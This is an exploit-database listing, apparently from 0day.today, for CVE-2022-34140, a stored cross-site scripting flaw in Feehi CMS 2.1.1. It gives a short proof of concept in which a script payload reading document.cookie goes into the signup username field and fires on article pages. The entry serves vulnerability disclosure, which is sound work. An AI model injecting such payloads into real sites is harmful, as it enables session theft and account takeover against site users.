Lucene search

K
zdtShivam Singh1337DAY-ID-37902
HistoryAug 09, 2022 - 12:00 a.m.

Feehi CMS 2.1.1 - Stored Cross-Site Scripting Vulnerability

2022-08-0900:00:00
Shivam Singh
0day.today
284
feehi cms
stored cross-site scripting
vulnerability
xss
linux
windows
docker
cve-2022-34140

EPSS

0.002

Percentile

64.7%

# Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Shivam Singh
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
#Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Windows, Docker
# CVE : CVE-2022-34140


# Proof of Concept:
1-Sing-up https://localhost.cms.feehi/
2-Inject The XSS Payload in Username:
"><script>alert(document.cookie)</script> fill all required fields and
click the SignUp button
3-Login to Your Account, Go to any article page then XSS will trigger.

EPSS

0.002

Percentile

64.7%